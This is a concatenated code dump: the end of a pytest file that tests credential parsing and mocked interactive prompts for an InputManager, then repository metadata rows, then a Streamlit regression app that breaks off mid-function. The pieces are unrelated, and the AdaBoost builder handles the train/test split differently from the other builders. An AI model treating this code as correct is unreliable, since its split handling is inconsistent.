    """The query's total-result count is a positive int mirrored onto im.args."""
    manager = input_manager_with_2_workers
    total = manager.get_total_results_from_query(query)
    print(str(total))
    assert type(manager.args.total_results) is int
    assert type(total) is int
    assert total == manager.args.total_results
    assert total > 0
@pytest.mark.parametrize(
    "arg", [
        (secrets1_json_path),
        ('{"u1": "username", "p1": "password"}'),
        ('{"u1":"username" ,\n "p1":"password"}'),
        ('{\n"u1" : " username" ,\n "p1":"password"\n}'),
        # FIX: the original `open(...).read()` leaked a file handle at module
        # import time; read_text opens and closes the file.
        (Path(secrets2_json_path).read_text())
    ]
)
def test_get_json_creds_success(arg):
    """Credentials given as a file path or raw/whitespace-laden JSON parse to a dict."""
    im = InputManager()
    out = im.get_json_creds(arg)
    assert type(out) == dict
@pytest.mark.parametrize(
    "arg", [
        ("badfile.json")
    ]
)
def test_get_json_creds_badfile(arg):
    """A nonexistent credentials file raises with a missing-file message."""
    manager = InputManager()
    with pytest.raises(Exception) as excinfo:
        manager.get_json_creds(arg)
    assert "No such file or directory" in str(excinfo.value)
def test_interactive_input(capsys, creds, query):
    # Scripted answers consumed in prompt order: download dir, account count,
    # two usernames, the query, then two newlines accepting the default
    # polling interval and offline retries.
    input_values = [
        test_dir,
        2,
        creds["u1"],
        creds["u2"],
        query,
        "\n",
        "\n"
    ]
    im = InputManager()
    def mock_input():
        return input_values.pop(0)
    # Monkey-patch the module-level input() used by InputManager.
    input_manager.input = mock_input
    passwords = [
        creds["p1"],
        creds["p2"]
    ]
    def mock_getpass():
        return passwords.pop(0)
    # Same for getpass, which the password prompts go through.
    input_manager.getpass.getpass = mock_getpass
    im.interactive_input()
    out, err = capsys.readouterr()
    # Every stage of the interactive flow must have printed its prompt/result.
    assert "Default download directory set to" in out
    assert "Enter new path" in out
    assert "Enter number of accounts:" in out
    assert "Enter username of account" in out
    assert "Enter password of account" in out
    assert "Authenticating worker..." in out
    assert "Worker sucessfully authenticated." in out
    assert "Enter query:" in out
    assert "products found" in out
    assert "Default polling interval" in out
    assert "Enter new polling interval" in out
    assert "Default offline retries" in out
    assert "Enter new offline retries" in out
    print(out)
    args = im.return_args()
    assert type(args).__name__ == "Args"
    # 2 accounts -> 4 workers (presumably 2 workers per account — confirm).
    assert len(im.return_worker_list()) == 4
def test_interactive_input_resume_yes(worker_manager, capsys):
    # A save point exists; answering "y" resumes it, so no account/query
    # prompts should appear.
    worker_manager.setup_workdir()
    close_all_loggers()
    # Scripted answers: download dir, "y" to resume, two default-accepting
    # newlines for polling interval and offline retries.
    input_values = [
        test_dir,
        "y",
        "\n",
        "\n"
    ]
    im = InputManager()
    def mock_input():
        return input_values.pop(0)
    # Monkey-patch the module-level input() used by InputManager.
    input_manager.input = mock_input
    im.interactive_input()
    out, err = capsys.readouterr()
    print(out)
    assert "Default download directory set to" in out
    assert "Enter new path" in out
    assert "Save point found. Resume previous download? (y/n)" in out
    # Account/query prompts must be skipped when resuming.
    assert "Enter number of accounts:" not in out
    assert "Enter username of account" not in out
    assert "Enter password of account" not in out
    assert "Authenticating worker..." in out
    assert "Worker sucessfully authenticated." in out
    assert "Enter query:" not in out
    assert "products found" in out
    assert "Default polling interval" in out
    assert "Enter new polling interval" in out
    assert "Default offline retries" in out
    assert "Enter new offline retries" in out
    args = im.return_args()
    assert type(args).__name__ == "Args"
    # Resumed run restores the saved worker count.
    assert len(im.return_worker_list()) == 2
def test_interactive_input_resume_bad_config(worker_manager, creds, query, capsys):
    # Corrupt the saved config's query so resuming falls back to the full
    # fresh-input flow despite the user answering "y".
    worker_manager.query = "bad query"
    worker_manager.setup_workdir()
    close_all_loggers()
    # Scripted answers: download dir, "y" (resume attempt), then the full
    # fresh flow — account count, usernames, query, two default-accepting
    # newlines.
    input_values = [
        test_dir,
        "y",
        2,
        creds["u1"],
        creds["u2"],
        query,
        "\n",
        "\n"
    ]
    im = InputManager()
    def mock_input():
        return input_values.pop(0)
    # Monkey-patch the module-level input() used by InputManager.
    input_manager.input = mock_input
    passwords = [
        creds["p1"],
        creds["p2"]
    ]
    def getpass():
        return passwords.pop(0)
    input_manager.getpass.getpass = getpass
    im.interactive_input()
    out, err = capsys.readouterr()
    print(out)
    assert "Default download directory set to" in out
    assert "Enter new path" in out
    assert "Save point found. Resume previous download? (y/n)" in out
    # Fresh-flow prompts must appear because the saved config was unusable.
    assert "Enter number of accounts:" in out
    assert "Enter username of account" in out
    assert "Enter password of account" in out
    assert "Authenticating worker..." in out
    assert "Worker sucessfully authenticated." in out
    assert "Enter query:" in out
    assert "products found" in out
    assert "Default polling interval" in out
    assert "Enter new polling interval" in out
    assert "Default offline retries" in out
    assert "Enter new offline retries" in out
    args = im.return_args()
    assert type(args).__name__ == "Args"
    assert len(im.return_worker_list()) == 4
def test_interactive_input_resume_invalid_input_and_no(worker_manager, creds, query, capsys):
    # An invalid answer ("nope") to the resume prompt should be re-asked;
    # answering "n" then goes through the full fresh-input flow.
    worker_manager.setup_workdir()
    close_all_loggers()
    # Scripted answers: download dir, invalid "nope", "n", then the fresh
    # flow — account count, usernames, query, two default-accepting newlines.
    input_values = [
        test_dir,
        "nope",
        "n",
        2,
        creds["u1"],
        creds["u2"],
        query,
        "\n",
        "\n"
    ]
    im = InputManager()
    def mock_input():
        return input_values.pop(0)
    # Monkey-patch the module-level input() used by InputManager.
    input_manager.input = mock_input
    passwords = [
        creds["p1"],
        creds["p2"]
    ]
    def getpass():
        return passwords.pop(0)
    input_manager.getpass.getpass = getpass
    im.interactive_input()
    out, err = capsys.readouterr()
    print(out)
    assert "Default download directory set to" in out
    assert "Enter new path" in out
    assert "Save point found. Resume previous download? (y/n)" in out
    # Declining resume is not a config failure, so no error message.
    assert "Failed to load config from config.json" not in out
    assert "Enter number of accounts:" in out
    assert "Enter username of account" in out
    assert "Enter password of account" in out
    assert "Authenticating worker..." in out
    assert "Worker sucessfully authenticated." in out
    assert "Enter query:" in out
    assert "products found" in out
    assert "Default polling interval" in out
    assert "Enter new polling interval" in out
    assert "Default offline retries" in out
    assert "Enter new offline retries" in out
    args = im.return_args()
    assert type(args).__name__ == "Args"
    assert len(im.return_worker_list()) == 4
| 29.542969
| 104
| 0.648023
| 991
| 7,563
| 4.752775
| 0.129162
| 0.059448
| 0.121444
| 0.095117
| 0.83482
| 0.789172
| 0.762845
| 0.728238
| 0.696178
| 0.657113
| 0
| 0.008406
| 0.245009
| 7,563
| 255
| 105
| 29.658824
| 0.816462
| 0
| 0
| 0.700441
| 0
| 0
| 0.223883
| 0
| 0
| 0
| 0
| 0
| 0.321586
| 1
| 0.07489
| false
| 0.0837
| 0.030837
| 0.030837
| 0.136564
| 0.022026
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6304c7cdac16df7c1c2994911760b9601580f790
| 54,938
|
py
|
Python
|
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
import streamlit as st
import pandas as pd
import numpy as np
import base64
import re
import plotly.graph_objects as go
import plotly.express as px
# import seaborn as sns
# import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import GridSearchCV
from sklearn.datasets import load_diabetes
# Functions ............................................................................................................
def collect_numbers(x):
    """Parse a comma-separated string into a list of floats.

    Runs of commas are treated as a single separator and empty tokens are
    skipped, so "1,,2" -> [1.0, 2.0] and "" -> [].

    :param x: the raw user-entered string.
    :return: list of floats parsed from the string.
    """
    # FIX (PEP 8 E731): was an assigned lambda; a def gives real names in
    # tracebacks and a place for documentation. Call signature is unchanged.
    return [float(tok) for tok in re.split(',+', x) if tok != ""]


def collect_numbers_int(x):
    """Parse a comma-separated string into a list of ints (see collect_numbers)."""
    return [int(tok) for tok in re.split(',+', x) if tok != ""]
def filedownload(df):
    """Render *df* as an HTML link that downloads it as a CSV file.

    :param df: dataframe to export.
    :return: HTML anchor tag embedding the CSV as a base64 data URI.
    """
    csv_text = df.to_csv(index=False)
    # str -> bytes -> base64 bytes -> base64 str
    encoded = base64.b64encode(csv_text.encode()).decode()
    return f'<a href="data:file/csv;base64,{encoded}" download="model_performance.csv">Download CSV File</a>'
def build_model_Adaboost_Regressor(df):
    """
    Build, tune and visualize an AdaBoost regression model.

    Takes inputs from the Streamlit web interface and uses them for building
    the model; hyperparameters are tuned with GridSearchCV (5-fold) and the
    tuning surface is plotted with Plotly.

    NOTE(review): relies on module-level names set elsewhere in this file
    (presumably by the Streamlit sidebar): split_size, loss, random_state,
    param_grid, n_jobs, criterion — confirm they are defined before calling.

    :param df: dataframe whose last column is the target and the rest features.
    """
    from sklearn.ensemble import AdaBoostRegressor
    # flag set when the user asked for all three error metrics (shadows the
    # built-in all() inside this function)
    all=False
    X = df.iloc[:, :-1] # Using all column except for the last column as X
    Y = df.iloc[:, -1] # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
    adaboost = AdaBoostRegressor(loss= loss, random_state= random_state)
    # 5-fold cross-validated grid search over param_grid
    grid = GridSearchCV(estimator=adaboost, param_grid=param_grid, cv=5, n_jobs=n_jobs)
    grid.fit(X_train, Y_train)
    st.subheader('Model Performance')
    Y_pred_test = grid.predict(X_test)
    # R^2 is always reported; the error metric(s) depend on `criterion`
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" %r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" %mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        all = True
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" %mse)
        st.write('Root Mean Squared Error (RMSE):')
        rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
        st.info("%0.2f" %rsme)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" %mae)
    st.write("The best parameters are %s with a score of %0.2f"
             % (grid.best_params_, grid.best_score_))
    st.subheader('Model Parameters')
    st.write(grid.get_params())
    # Grid Data: combine searched parameter combinations with their CV scores
    grid_results = pd.concat(
        [pd.DataFrame(grid.cv_results_["params"]), pd.DataFrame(grid.cv_results_["mean_test_score"], columns=["R2"])],
        axis=1)
    # Segment data into groups based on the 2 hyperparameters
    grid_contour = grid_results.groupby(['learning_rate', 'n_estimators']).mean()
    # Pivoting the data
    grid_reset = grid_contour.reset_index()
    grid_reset.columns = ['learning_rate', 'n_estimators', 'R2']
    # NOTE(review): positional args to DataFrame.pivot were removed in
    # pandas 2.0 — this call assumes an older pandas.
    grid_pivot = grid_reset.pivot('learning_rate', 'n_estimators')
    x = grid_pivot.columns.levels[1].values
    y = grid_pivot.index.values
    z = grid_pivot.values
    # -----Plot-----#  3-D surface of R2 over the hyperparameter grid
    layout = go.Layout(
        xaxis=go.layout.XAxis(
            title=go.layout.xaxis.Title(
                text='n_estimators')
        ),
        yaxis=go.layout.YAxis(
            title=go.layout.yaxis.Title(
                text='Learning_rate')
        ))
    fig = go.Figure(data=[go.Surface(z=z, y=y, x=x)], layout=layout)
    fig.update_layout(title='Hyperparameter tuning',
                      scene=dict(
                          xaxis_title='n_estimators',
                          yaxis_title='Learning_Rate',
                          zaxis_title='R2'),
                      autosize=False,
                      width=800, height=800,
                      margin=dict(l=65, r=50, b=65, t=90))
    st.plotly_chart(fig)
    if all == True:
        # bar chart comparing the three error metrics computed above
        criteria = ['RMSE', 'MSE', 'MAE']
        # colors = {'RMSE': 'red',
        #           'MSE': 'orange',
        #           'MAE': 'lightgreen'}
        fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
        st.plotly_chart(fig)
        # Change the bar mode
        fig.update_layout(barmode='group')
    # -----Save grid data-----#
    x = pd.DataFrame(x)
    y = pd.DataFrame(y)
    z = pd.DataFrame(z)
    df = pd.concat([x, y, z], axis=1)
    st.markdown(filedownload(grid_results), unsafe_allow_html=True)
##################################################### Linear regression to be worked on
def build_model_Linear_Regressor(df):
    """
    Build and evaluate a Linear Regression model.

    Takes input from the Streamlit web interface (module-level globals
    ``split_size``, ``ind_var`` and ``criterion``) and plots the result
    using the Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.linear_model import LinearRegression
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting. The sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects. Passing the
    # raw integer would be treated as an absolute number of test rows.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    model = LinearRegression()
    if not ind_var:
        # Guard: with no independent variables selected none of the branches
        # below runs and Y_pred_test would be unbound at the metrics section.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: fit on one column and draw a 2-D regression line.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        model.fit(dfx, Y_train)
        Y_pred_test = model.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: fit on both and render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        model.fit(dfx, Y_train)
        dfxtest = X_test[ind_var]
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = model.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = model.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=5))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all of them, then show one 2-D fit per
        # feature so the user can inspect individual dependencies.
        dfx = X_train[ind_var]
        model.fit(dfx, Y_train)
        dfxtest = X_test[ind_var]
        Y_pred_test = model.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        for feature in ind_var:
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            model.fit(dfx, Y_train)
            pred = model.predict(dfxtest)
            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and therefore never took effect.
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
##################################################Randomm Forest
def build_model_RandomForestRegressor(df):
    """
    Build a model using the Random Forest regression algorithm.

    (The previous docstring said "Adaboost"; this function fits a
    RandomForestRegressor.)  Takes input from the Streamlit web interface,
    tunes ``n_estimators`` and ``max_features`` with GridSearchCV and plots
    the results using the Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.ensemble import RandomForestRegressor
    show_all = False  # renamed from `all`, which shadowed the builtin
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    # NOTE(review): the sidebar range sliders deliver (low, high) tuples for
    # n_estimators/max_features; GridSearchCV overrides both via param_grid,
    # so the constructor values here act only as placeholders.
    rf = RandomForestRegressor(n_estimators=n_estimators,
                               random_state=random_state,
                               max_features=max_features,
                               min_samples_split=min_samples_split,
                               min_samples_leaf=min_samples_leaf,
                               bootstrap=bootstrap,
                               oob_score=oob_score,
                               n_jobs=n_jobs)
    grid = GridSearchCV(estimator=rf, param_grid=param_grid, cv=5)
    grid.fit(X_train, Y_train)
    st.subheader('Model Performance')
    Y_pred_test = grid.predict(X_test)
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        show_all = True
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
    st.write("The best parameters are %s with a score of %0.2f"
             % (grid.best_params_, grid.best_score_))
    st.subheader('Model Parameters')
    st.write(grid.get_params())
    # Grid Data .......
    grid_results = pd.concat(
        [pd.DataFrame(grid.cv_results_["params"]),
         pd.DataFrame(grid.cv_results_["mean_test_score"], columns=["R2"])],
        axis=1)
    # Average the CV score for every (max_features, n_estimators) pair
    grid_contour = grid_results.groupby(['max_features', 'n_estimators']).mean()
    # Pivot into a 2-D table for the surface plot.  Keyword arguments keep
    # this working on pandas >= 2.0, where positional pivot args were removed.
    grid_reset = grid_contour.reset_index()
    grid_reset.columns = ['max_features', 'n_estimators', 'R2']
    grid_pivot = grid_reset.pivot(index='max_features', columns='n_estimators')
    x = grid_pivot.columns.levels[1].values
    y = grid_pivot.index.values
    z = grid_pivot.values
    # -----Plot-----#
    layout = go.Layout(
        xaxis=go.layout.XAxis(
            title=go.layout.xaxis.Title(
                text='n_estimators')
        ),
        yaxis=go.layout.YAxis(
            title=go.layout.yaxis.Title(
                text='max_features')
        ))
    fig = go.Figure(data=[go.Surface(z=z, y=y, x=x)], layout=layout)
    fig.update_layout(title='Hyperparameter tuning (Surface Plot)',
                      scene=dict(
                          xaxis_title='n_estimators',
                          yaxis_title='max_features',
                          zaxis_title='R2'),
                      autosize=False,
                      width=800, height=800,
                      margin=dict(l=65, r=50, b=65, t=90))
    st.plotly_chart(fig)
    if show_all:
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        fig.update_layout(barmode='group')  # set layout before rendering
        st.plotly_chart(fig)
    # Offer the raw grid-search results for download.  (The former x/y/z/df
    # DataFrame concat was dead code — its result was never used — and has
    # been removed.)
    st.markdown(filedownload(grid_results), unsafe_allow_html=True)
################################################## SVR
def build_model_SVR(df):
    """
    Build a model using the Support Vector Regression algorithm.

    Takes input from the Streamlit web interface (globals ``split_size``,
    ``ind_var``, ``criterion``, ``param_grid``), tunes hyperparameters with
    GridSearchCV and plots the results using the Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.svm import SVR
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    model = SVR()
    if not ind_var:
        # Guard: without selected variables `clf` and `Y_pred_test` would be
        # unbound below, crashing at the best-parameters report.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: grid-search on one column, draw a 2-D fit.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=3))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all, then one per-feature 2-D view.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        clf1 = GridSearchCV(model, param_grid)
        for feature in ind_var:
            # Re-fit on each feature alone for the per-feature plot.
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            clf1.fit(dfx, Y_train)
            pred = clf1.predict(dfxtest)
            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.write("The best parameters are %s with a score of %0.2f"
             % (clf.best_params_, clf.best_score_))
    st.subheader('Model Parameters')
    st.write(clf.get_params())
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and had no effect.  (A stale commented-out
        # seaborn heatmap block was removed here.)
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
################################################## SGD
def build_model_SGD(df):
    """
    Build a model using the Stochastic Gradient Descent regression algorithm.

    Takes input from the Streamlit web interface (globals ``split_size``,
    ``ind_var``, ``criterion``, ``param_grid``, ``scale``), tunes
    hyperparameters with GridSearchCV and plots the results using the
    Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.linear_model import SGDRegressor
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    if scale == 'True':
        # Standardise features (the sidebar selectbox yields the STRING
        # 'True', not a boolean).  The scaler is fitted on the training
        # split only to avoid test-set leakage.
        from sklearn.preprocessing import StandardScaler
        cols = X_train.columns
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
        X_test = scaler.transform(X_test)
        X_train = pd.DataFrame(X_train, columns=cols)
        X_test = pd.DataFrame(X_test, columns=cols)
    model = SGDRegressor()
    if not ind_var:
        # Guard: without selected variables `clf` and `Y_pred_test` would be
        # unbound below, crashing at the best-parameters report.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: grid-search on one column, draw a 2-D fit.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=3))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all, then one per-feature 2-D view.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        clf1 = GridSearchCV(model, param_grid)
        for feature in ind_var:
            # Re-fit on each feature alone for the per-feature plot.
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            clf1.fit(dfx, Y_train)
            pred = clf1.predict(dfxtest)
